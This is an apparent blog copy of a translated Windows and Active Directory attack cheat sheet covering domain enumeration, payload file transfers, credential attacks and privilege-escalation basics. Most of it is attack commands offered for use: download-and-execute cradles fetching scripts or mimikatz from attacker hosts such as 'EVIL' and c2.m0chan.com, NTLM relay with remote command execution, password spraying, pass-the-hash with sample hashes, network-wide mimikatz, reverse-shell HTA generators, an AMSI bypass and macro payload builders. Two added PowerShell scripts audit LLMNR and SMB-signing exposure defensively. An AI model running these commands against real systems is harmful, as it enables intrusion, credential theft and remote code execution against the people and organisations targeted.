Windows command cheat-sheet notes collection - hacktoday.net - 2020.12.01 version

Notes:

These notes come from an article on the hacktoday.net forum. I translated the annotations in full and, based on my own target-practice studies, added or removed some content. I am keeping them on my blog for later review and as a reference for the security enthusiasts who browse my blog.

I. Windows basic information enumeration

Account and user-group enumeration

net users # list local user accounts
net users /domain # list user accounts in the current domain
net localgroup # list local groups
net groups /domain # list domain groups
net groups /domain "Domain Admins" # list members of the Domain Admins group

Get-ADUser
Get-Domain
Get-DomainUser
Get-DomainGroup
Get-DomainGroupMember -identity "Domain Admins" -Domain m0chanAD.local -DomainController 10.10.14.10
Find-DomainShare


# Host discovery
netdiscover -r subnet/24
nbtscan -r [range]
for /L %i in (1,1,255) do @ping.exe -n 1 -w 50 <10.10.10>.%i | findstr TTL


# Reverse DNS lookup
$ComputerIPAddress = "10.10.14.14"
[System.Net.Dns]::GetHostEntry($ComputerIPAddress).HostName

Users with an SPN

# https://github.com/tevora-threat/SharpView

Get-DomainUser -SPN

Get-ADComputer -filter {ServicePrincipalName -like <keyword>} -Properties OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack,PasswordLastSet,LastLogonDate,ServicePrincipalName,TrustedForDelegation,TrustedtoAuthForDelegation

Bulk Kerberos enumeration

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Offensive C# scripts for enumeration

# https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts

LDAPUtility.cs

Usage: ldaputility.exe options domain [arguments]

ldaputility.exe DumpAllUsers m0chan
ldaputility.exe DumpUser m0chan mr.un1k0d3r
ldaputility.exe DumpUsersEmail m0chan
ldaputility.exe DumpAllComputers m0chan
ldaputility.exe DumpComputer m0chan DC01
ldaputility.exe DumpAllGroups m0chan
ldaputility.exe DumpGroup m0chan "Domain Admins"
ldaputility.exe DumpPasswordPolicy m0chan

There is also WMIUtility.cs for WMI calls and LDAPQuery.cs for raw LDAP queries.
See the GitHub repository linked above for details.

AD domain basic manual enumeration

nltest /DCLIST:DomainName  # list the domain controllers; DomainName is the current domain name
nltest /DCNAME:DomainName # name of the PDC of the domain
nltest /DSGETDC:DomainName # locate a domain controller for the domain

# Get the current domain - similar to Get-Domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Get domain trusts - similar to Get-DomainTrust
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# Get the current forest
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# Get forest trusts
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

nltest [server:<fqdn_foreign_domain>] /domain_trusts /all_trusts /v

nltest /dsgetfti:<domain>

nltest /server:<ip_dc> /domain_trusts /all_trusts

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# List all domain controllers
nltest /dclist:offense.local
net group "domain controllers" /domain

# DC used by the current session
nltest /dsgetdc:m0chanAD.local

# Domain trusts from CMD
nltest /domain_trusts

# User information from CMD
nltest /user:"m0chan"

# Domain and DC of the authenticated user
klist

# All logon sessions, including NTLM and Kerberos
klist sessions

# View Kerberos tickets
klist

# View the cached TGT
klist tgt

# whoami on old Windows systems
set u

# List all usernames in the domain
([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname

# List domain admins (accounts with admincount=1)

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

# List all information about a specific user

([adsisearcher]"(&(objectClass=User)(samaccountname=<username>))").FindAll().Properties

# List samaccountname and description of every matching object (this filter matches groups)

([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description }

AD enumeration with adtool from a Linux host in the domain

# https://github.com/jasonwbarnett/linux-adtool

tar zxvf adtools-1.x.tar.gz
cd adtools-1.x
./configure
make
make install

> adtool list ou=user,dc=example,dc=com
CN=allusers,OU=user,DC=example,DC=com
OU=finance,OU=user,DC=example,DC=com
OU=administration,OU=user,DC=example,DC=com

> adtool oucreate marketing ou=user,dc=example,dc=com
> adtool useradd jsmith ou=marketing,ou=user,dc=example,dc=com
> adtool setpass jsmith banana
> adtool unlock jsmith
> adtool groupadd allusers jsmith
> adtool attributereplace jsmith telephonenumber 123
> adtool attributereplace jsmith mail jsmith@example.com

SharpView enumeration functions

# https://github.com/tevora-threat/SharpView

Get-DomainFileServer
Get-DomainGPOUserLocalGroupMapping
Find-GPOLocation
Get-DomainGPOComputerLocalGroupMapping
Find-GPOComputerAdmin
Get-DomainObjectAcl
Get-ObjectAcl
Add-DomainObjectAcl
Add-ObjectAcl
Remove-DomainObjectAcl
Get-RegLoggedOn
Get-LoggedOnLocal
Get-NetRDPSession
Test-AdminAccess
Invoke-CheckLocalAdminAccess
Get-WMIProcess
Get-NetProcess
Get-WMIRegProxy
Get-Proxy
Get-WMIRegLastLoggedOn
Get-LastLoggedOn
Get-WMIRegCachedRDPConnection
Get-CachedRDPConnection
Get-WMIRegMountedDrive
Get-RegistryMountedDrive
Find-InterestingDomainAcl
Invoke-ACLScanner
Get-NetShare
Get-NetLoggedon

SMB service enumeration commands

nmap -p 139,445 --script smb.nse,smb-enum-shares,smbls
enum4linux 1.3.3.7
smbmap -H 1.3.3.7
smbclient -L \\INSERTIPADDRESS
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john
nbtscan [SUBNET]


# Check for SMB signing
nmap --script smb-security-mode.nse -p 445 10.10.14.14

SNMP service enumeration commands

snmpwalk -c public -v1 10.10.14.14
snmpcheck -t 10.10.14.14 -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 10.10.14.14 -oG snmp_results.txt
snmpenum -t 10.10.14.14

MySQL service enumeration command

nmap -sV -Pn -vv  10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

DNS zone-transfer enumeration

dig axfr blah.com @ns1.m0chan.com
nslookup -> set type=any -> ls -d m0chan.com
dnsrecon -d m0chan -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

LDAP service enumeration

ldapsearch -H ldap://<ip>
ldapwhoami

RPC service enumeration

rpcclient -U "10.10.14.14"
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser <user>
lsaquery
lookupnames Guest
lookupnames Administrator

Remote login to the Windows desktop

rdesktop -u guest -p guest INSERTIPADDRESS -g 94%

# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS

II. File transfer commands on Windows

TFTP file transfer

On m0chan's machine:
mkdir tftp
atftpd --daemon --port 69 tftp
cp *file* tftp
On the victim machine:
tftp -i <[IP]> GET <[FILE]>

FTP file transfer

echo open <[IP]> 21 > ftp.txt
echo USER demo >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

VBS script file transfer

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs


cscript wget.vbs <url> <out_file>

Use the echoup function on pentest.ws to generate the echo commands.
https://pentest.ws/features

PowerShell file transfer

# https://github.com/danielbohannon/Invoke-CradleCrafter
# Use this to craft obfuscated cradles

Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"

(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename")

# PowerShell download straight into memory

IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')

# PowerShell through a proxy

$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('https://server/script.ps1'));

PowerShell Base64 file transfer

# Read the file as raw bytes: Get-Content followed by UTF8.GetBytes corrupts a binary file such as a .kdbx
$fileName = "Passwords.kdbx"
$fileContentBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $fileName).Path)
$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)
$fileContentEncoded | Set-Content ($fileName + ".b64")

Tunnelled file copy / pscp.exe

pscp.exe C:\Users\Public\m0chan.txt user@target:/tmp/m0chan.txt
pscp.exe user@target:/home/user/m0chan.txt C:\Users\Public\m0chan.txt

BitsAdmin.exe file transfer

cmd.exe /c "bitsadmin.exe /transfer downld_job /download /priority high http://c2.m0chan.com C:\Temp\mimikatz.exe & start C:\Temp\binary.exe"

Remote Desktop file transfer

rdesktop 10.10.10.10 -r disk:linux='/home/user/filetransferout'

File transfer via the WinHttp COM object

[System.Net.WebRequest]::DefaultWebProxy
[System.Net.CredentialCache]::DefaultNetworkCredentials
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

CertUtil.exe file transfer

# File transfer

certutil.exe -urlcache -split -f https://m0chan:8888/filename outputfilename

# CertUtil Base64 transfers

certutil.exe -encode inputFileName encodedOutputFileName
certutil.exe -decode encodedInputFileName decodedOutputFileName

Curl (Windows 1803+) file transfer

curl http://server/file -o file
curl http://server/file.bat | cmd

IEX(curl http://server/script.ps1);Invoke-Blah

SMB file transfer

python smbserver.py Share `pwd` -u m0chan -p m0chan --smb-2support

III. Windows exploitation and attack collection

Code execution with MSHTA

mshta.exe is a default binary shipped with every version of Windows; it allows .hta payloads to be executed

mshta.exe https://m0chan.com/exploit.hta

LLMNR / NBT-NS spoofing

# Responder, for stealing credentials

git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0


LLMNR and NBT-NS are usually on by default and are meant to act as a fallback to DNS.
I.e. if you look up \\HRServer\ and it does not exist, Windows (by default) sends an LLMNR broadcast onto the network.
With Responder we can answer these broadcasts and say "yes, I am HRServer, authenticate to me", and we get an NTLMv2 hash that can be cracked or relayed.
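
The fallback described above is a host setting, so it can be audited and turned off. The script below is an added example written for these notes, not part of the original article or of Responder: it reads the LLMNR policy value and the per-interface NetBIOS setting, and the Disable- function switches both off. The registry paths are the documented Windows locations; the function names are this script's own. Run it as administrator.

```powershell
# Added example (not from the original notes): audit and optionally disable the
# two name-resolution fallbacks that LLMNR/NBT-NS poisoning relies on.

function Get-NameResolutionFallbackState {
    # LLMNR is controlled by the DNSClient policy value EnableMulticast (0 = disabled).
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
    # $null means the policy is unset, and Windows then defaults to LLMNR enabled.
    $llmnrEnabled = ($llmnr -ne 0)

    # NetBIOS over TCP/IP is per interface: NetbiosOptions 2 = disabled, 0 = from DHCP, 1 = enabled.
    $nbtRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    $interfaces = Get-ChildItem -Path $nbtRoot | ForEach-Object {
        $opt = (Get-ItemProperty -Path $_.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
        [pscustomobject]@{ Interface = $_.PSChildName; NetbiosOptions = $opt; NbtEnabled = ($opt -ne 2) }
    }
    [pscustomobject]@{
        LlmnrEnabled  = $llmnrEnabled
        AnyNbtEnabled = [bool]($interfaces | Where-Object NbtEnabled)
        Interfaces    = $interfaces
    }
}

function Disable-NameResolutionFallback {
    # Remediation. Turning LLMNR off is safe on a domain-joined host (DNS is
    # authoritative); turning NBT-NS off breaks access to hosts that are only
    # reachable by NetBIOS name, so confirm nothing depends on it first.
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    if (-not (Test-Path $llmnrKey)) { New-Item -Path $llmnrKey -Force | Out-Null }
    Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord

    $nbtRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    Get-ChildItem -Path $nbtRoot | ForEach-Object {
        Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Value 2 -Type DWord
    }
}

$state = Get-NameResolutionFallbackState
"LLMNR enabled: $($state.LlmnrEnabled)   NBT-NS enabled on any interface: $($state.AnyNbtEnabled)"
$state.Interfaces | Format-Table -AutoSize
# Disable-NameResolutionFallback   # uncomment once legacy dependencies are ruled out
```

In a domain the same two settings are normally pushed by GPO (Computer Configuration > Administrative Templates > Network > DNS Client > "Turn off multicast name resolution", and the NetBIOS setting in the DHCP scope or adapter properties); the script is for checking a single host or a lab box.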

Responder WPAD attack

responder -I eth0 wpad

By default Windows is configured to look for a Web Proxy Auto-Discovery file when using the internet.
Open Internet Explorer and search Google, and it will automatically look for the WPAD file...
Then take the NTLMv2 hash and relay it with ntlmrelay, or send it to the cracking rig.

mitm6 attack - compromising an IPv4 network via IPv6

# Use when the WPAD attack does not work; this uses IPv6 and DNS to relay credentials to the target.

By default IPv6 should be enabled.
git clone https://github.com/fox-it/mitm6.git
cd /opt/tools/mitm6
pip install .

mitm6 -d m0chanAD.local

Now the weakness kicks in: Windows prefers IPv6 over IPv4, which means DNS = controlled by the attacker.

ntlmrelayx.py -wh webserverhostingwpad:80 -t smb://TARGETIP/ -i

-i opens an interactive shell.

Shout out to hausec for this super nice tip.

SCF file attack

Create a .scf file, drop it on an SMB share and start Responder ;)


Filename = @m0chan.scf

[Shell]
Command=2
IconFile=\\10.10.14.2\Share\test.ico
[Taskbar]
Command=ToggleDesktop

NTLM relay attack

Good article explaining the difference between NTLM and Net-NTLMv1/v2

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

TL;DR NTLMv1/v2 is shorthand for Net-NTLMv1/v2, so they are the same thing.

You can perform a Pass The Hash attack with an NTLM hash.
You cannot perform a Pass The Hash attack with a Net-NTLM hash.

PS: you cannot relay a hash back to the host it came from.
PS: SMB signing must be disabled on the target for the relay to work; you can check this with an nmap scan or with crackmapexec

crackmapexec smb 10.10.14.0/24 --gen-relay-list targets.txt

This gives you a list of the hosts in the subnet that do not have SMB signing enabled.

python Responder.py -I <interface> -r -d -w
ntlmrelayx.py -tf targets.txt (by default this dumps the local SAM of the targets, not very useful, is it?)

How about we execute a command instead.

ntlmrelayx.py -tf targets.txt -c powershell.exe -Enc asdasdasdasd
ntlmrelayx.py -tf targets.txt -c powershell.exe /c download and execute beacon... = RIP
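
The relay list above and the "Check for SMB Signing" nmap line in the SMB enumeration section both come down to one server setting: whether signing is merely enabled (negotiable) or required. The script below is an added example written for these notes, not from the original article or from CrackMapExec: it reads that setting on the local host and on a constructed list of remote hosts over PowerShell remoting, flags hosts that a relay would accept, and contains the one-line remediation. It assumes WinRM is reachable and the caller is a local administrator on each host; the host names are placeholders and the function names are this script's own.

```powershell
# Added example (not from the original notes): audit SMB signing state, the
# property that decides whether a host is a viable NTLM relay target.

function Get-SmbSigningState {
    param([Parameter(Mandatory)] [string] $ComputerName)
    # Get-SmbServerConfiguration exposes the two signing settings:
    #   EnableSecuritySignature  - signing is offered (can still be negotiated away)
    #   RequireSecuritySignature - signing is mandatory (relayed sessions fail)
    $cfg = if ($ComputerName -eq $env:COMPUTERNAME) {
        Get-SmbServerConfiguration
    } else {
        Invoke-Command -ComputerName $ComputerName -ScriptBlock { Get-SmbServerConfiguration }
    }
    [pscustomobject]@{
        ComputerName = $ComputerName
        Enabled      = $cfg.EnableSecuritySignature
        Required     = $cfg.RequireSecuritySignature
        RelayRisk    = -not $cfg.RequireSecuritySignature
    }
}

function Set-SmbSigningRequired {
    param([Parameter(Mandatory)] [string] $ComputerName)
    # Remediation: require signing on the SMB server. Clients that cannot sign
    # (old SMB1-only devices) stop connecting, so test before a fleet-wide rollout.
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        Set-SmbServerConfiguration -EnableSecuritySignature $true -RequireSecuritySignature $true -Force
    }
}

# Constructed sample inventory; replace with your own host list.
$hosts = @($env:COMPUTERNAME, 'FILESRV01.example.local', 'APP02.example.local')
$report = foreach ($h in $hosts) {
    try { Get-SmbSigningState -ComputerName $h }
    catch { [pscustomobject]@{ ComputerName = $h; Enabled = $null; Required = $null; RelayRisk = 'unreachable' } }
}
$report | Format-Table -AutoSize

# Hosts with RelayRisk = True are the ones --gen-relay-list would return.
# Uncomment to enforce signing on them:
# $report | Where-Object { $_.RelayRisk -eq $true } | ForEach-Object { Set-SmbSigningRequired -ComputerName $_.ComputerName }
```

Domain controllers require signing by default, which is why relay lists are usually full of member servers and workstations; the matching GPO setting is "Microsoft network server: Digitally sign communications (always)".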

PrivExchange exploit

# https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

Combine privexchange.py and ntlmrelayx

ntlmrelayx.py -t ldap://DOMAINCONTROLLER.m0chanAD.local --escalate-user TARGETUSERTOESCALATE

python privexchange.py -ah FDQN.m0chanAD.local DOMAINCONTROLLER.m0chanAD.local -u TARGETUSERTOESCALATE -d m0chanAD.local

Exchange password spraying

# https://github.com/dafthack/MailSniper.git

Invoke-PasswordSprayOWA -ExchHostname EXCH2012.m0chanAD.local -UserList .\users.txt -Password Winter2019


# https://github.com/sensepost/ruler

./ruler-linux64 -domain mc0hanAD.local --insecure brute --userpass userpass.txt -v

ExchangeRelayX - Exchange relay / replay script attack

# https://github.com/quickbreach/ExchangeRelayX

An NTLM relay tool targeting the EWS endpoint of on-premises Exchange servers. Gives hackers an OWA-style interface.

./exchangeRelayx.py -t https://mail.quickbreach.com

Exchange mailbox email exfiltration

# https://github.com/dafthack/MailSniper.git

Enumerate the Global Address List

Get-GlobalAddressList -ExchHostname EXCH2012.m0chanAD.local -Username jamie@m0chanAD.local -Password Winter2019

Enumerate AD usernames

Get-ADUsernameFromEWS -Emaillist .\users.txt

Enumerate mailbox folders

Get-MailboxFolders -Mailbox jamie@m0chanAD.local

Enumerate passwords & credentials stored in emails

Invoke-SelfSearch -Mailbox jamie@m0chanAD.local

Enumerate passwords & credentials (any user's mailbox) - requires DA or Exchange admin

Invoke-GlobalMailSearch -ImpersonationAccount helenHR -ExchHostname Exch2012

CrackMapExec attacks

CrackMapExec is installed on Kali, or grab the Windows binaries from GitHub.

Has 3 execution methods
crackmapexec smb <- create and run a service over SMB
crackmapexec wmi <- execute commands over WMI
crackmapexec at <- schedule a task with the Task Scheduler

Plain commands can be executed with the -x flag, i.e.

crackmapexec smb 10.10.14.0/24 -x whoami

crackmapexec smb 10.10.14.0/24 <- host discovery
crackmapexec smb 10.10.14.0/24 -u user -p 'Password'
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --pass-pol
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --shares


PTH also works with CME

crackmapexec smb 10.10.14.0/24 -u user -H e8bcd502fbbdcd9379305dca15f4854e

cme smb 10.8.14.14 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e --local-auth --shares


-- --local-auth authenticates as a local administrator; works well if the organisation uses the same local admin hash across the network and does not use LAPS

Dump the local SAM hashes

crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth --sam

Run Mimikatz:

crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz

^ Very noisy, but yes, you can run mimikatz across an entire network range. RIP domain admins

Enumerate AV products:

crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M enum_avproducts

Mail spraying

Invoke-PasswordSprayOWA -ExchHostname m0chanAD.local -userlist harvestedUsers.txt -password Summer2019

[*] Now spraying the OWA portal at https://m0chanAD.local/owa/

[*] SUCCESS! User:m0chan:Summer2019

Lmao, did you really think I would use Summer2019 as a password?

Reading Exchange email with PowerShell

$outlook = New-Object -ComObject outlook.application
$olFolders ="Microsoft.Office.Interop.Outlook.OlDefaultFolders" -as [type]
$namespace = $Outlook.GetNameSpace("MAPI")
$inbox = $namespace.GetDefaultFolder($olFolders::olFolderInbox)
$inbox.items.count
$inbox.items
$inbox.items.GetLast()

Kerberos attack reference links

# https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
# https://m0chan.github.io/Kerberos-Attacks-In-Depth

MSSQL exploitation (PowerUpSQL)

# https://github.com/NetSPI/PowerUpSQL

# View SQL instances
Get-SQLInstanceDomain [| Get-SQLServerInfo]

# Log in with a domain account
Get-SQLConnectionTestThreaded

# Log in with a default password
Get-SQLServerDefaultLoginPw

# List DBs, tables & columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

# Search column names for a word

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

# Try to execute commands (RCE)

Invoke-SQLOSCmd


# Enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell '<cmd>'
go

Malicious macros with MSBuild

# https://github.com/infosecn1nja/MaliciousMacroMSBuild

# https://lolbas-project.github.io/lolbas/Binaries/Msbuild/ - MSBuild explained

Create a shellcode MSBuild VBA macro:
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba

Create a PowerShell MSBuild VBA macro:
python m3-gen.py -p powershell -i /path/payload.ps1 -o output.vba

Create a custom MSBuild VBA macro:
python m3-gen.py -p custom -i /path/msbuild.xml -o output.vba

Create a shellcode MSBuild VBA macro with a kill date:
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -k 20/03/2018

Create a shellcode MSBuild VBA macro with environment keying:
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain, microsoft, github

ClickOnce MSBuild payload

# https://github.com/hausec/MaliciousClickOnceMSBuild

1) Create a new .NET Framework console project in Visual Studio
2) Import Program.cs from this repository
3) Add the MSBuild payload file to the project
4) Publish the project

WeirdHTA - undetectable HTA

# https://github.com/felamos/weirdhta

python3 weirdhta.py --help
python3 weirdhta.py 10.10.10.10 4444 --normal (for a normal PowerShell reverse shell)
python3 weirdhta.py 10.10.10.10 4444 --smb (without a PowerShell payload, it will use SMB)
python3 weirdhta.py 10.10.10.10 4444 --powercat (for powercat)
python3 weirdhta.py 10.10.10.10 4444 --command 'c:\windows\system32\cmd.exe' (custom command)

Evil-WinRM help

# https://github.com/Hackplayers/evil-winrm

Ultimate shell for WinRM connections

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ]
-S, --ssl Enable SSL
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required)
-p, --password PASS Password
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-h, --help Display this help message

GetVulnerableGPO

# https://github.com/gpoguy/GetVulnerableGPO

PowerShell script to find "vulnerable" security-related GPOs that should be hardened (for more background see the GPO discoverability section of this blog post: https://sdmsoftware.com/group-policy-blog/security-related/security-fun-bloodhound-ms16-072-gpo-discoverability/). Requires GPMC and the SDM Software GPMC PowerShell module (used to parse GP settings more easily during the search): https://s3.amazonaws.com/sdmsoftware.com/dl/SDM-GPMC-Module2.0Setup.zip

Invoke-PSImage

# https://github.com/peewpw/Invoke-PSImage

Encodes a PowerShell script in the pixels of a PNG file and generates a one-liner to execute it

Invoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a one-liner for executing either from a file or from the web.

PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg
[Oneliner to execute from a file]


PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest
[Oneliner to execute from the web]

Meterpreter + Donut - .NET shellcode injection

# https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html

A module for executing arbitrary shellcode from Meterpreter, i.e. running Mimikatz in memory, reflectively and interactively!

donut -f /tmp/mimikatz.exe -a 2 -o /tmp/payload.bin

use post/windows/manage/shellcode_inject
set SHELLCODE /tmp/payload.bin
set SESSION 1
run

Demiguise - encrypted HTA

# https://github.com/nccgroup/demiguise

Run demiguise.py, giving it an encryption key, the payload type, the output filename and the command you want the HTA to run.

Example: python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o

Since the tool outputs an HTML file containing JavaScript, you can simply take that JS and host it anywhere you like. This means that if your client's website is vulnerable to reflected XSS, you can use it to serve your HTA file from their (highly trusted) domain.

Also, Outlook does not block .html attachments by default, and neither do some other applications - use your imagination! :)

Grouper2

# https://github.com/l0ss/Grouper2

Find vulnerabilities in AD Group Policy

Grouper2 is a tool for pentesters that helps find security-related misconfigurations in Active Directory Group Policy.

Microsoft SQL attack reference link

https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

CrackMapExec common commands

# https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/

Command execution - cmd.exe

crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami

Command execution - powershell.exe

crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami

Check for logged-in users

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --lusers

Using local auth

crackmapexec 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth

Enumerating shares

crackmapexec 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth --shares

WDigest enable/disable

"This lets us re-enable the WDigest provider and dump cleartext credentials from LSA memory"

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest enable
crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest disable

Password policy

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --pass-pol

RID bruteforcing

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --rid-brute

Top credential attacks

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam

Pass the hash across a subnet

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaa35b51404ee:5509de4fa6e8d9f4a61100e51' --local-auth

Null sessions

crackmapexec smb <target(s)> -u '' -p ''


Modules - enum_chrome

sudo cme 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -M enum_chrome

Modules - enum_avproducts

sudo cme 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -M enum_avproducts

SharePoint tooling reference link

https://www.crummie5.club/the-lone-sharepoint/

IIS reference link

https://drive.google.com/file/d/1O0IARjqP4Pwa-ae1nAP8Nr9qb0ai2XPu/view

Everything you need to hack IIS, a recent talk by Shubs

Easy AMSI bypass (amsi.fail)

1. Open PowerShell and grab a unique AMSI bypass from: https://amsi.fail/

2. Grab your favourite C# assemblies from: https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/ These are just standard C# executables, reflectively loaded inside a PowerShell wrapper.

3. Host them locally and execute via IEX (New-Object net.webclient).downloadstring("http://x.x.x.x./Invoke-Seatbelt.ps1")

IV. Windows privilege escalation commands

Basic privesc information gathering

systeminfo
wmic qfe
net users
hostname
whoami
net localgroups
echo %logonserver%
netsh firewall show state
netsh firewall show config
netstat -an
type C:\Windows\system32\drivers\etc\hosts

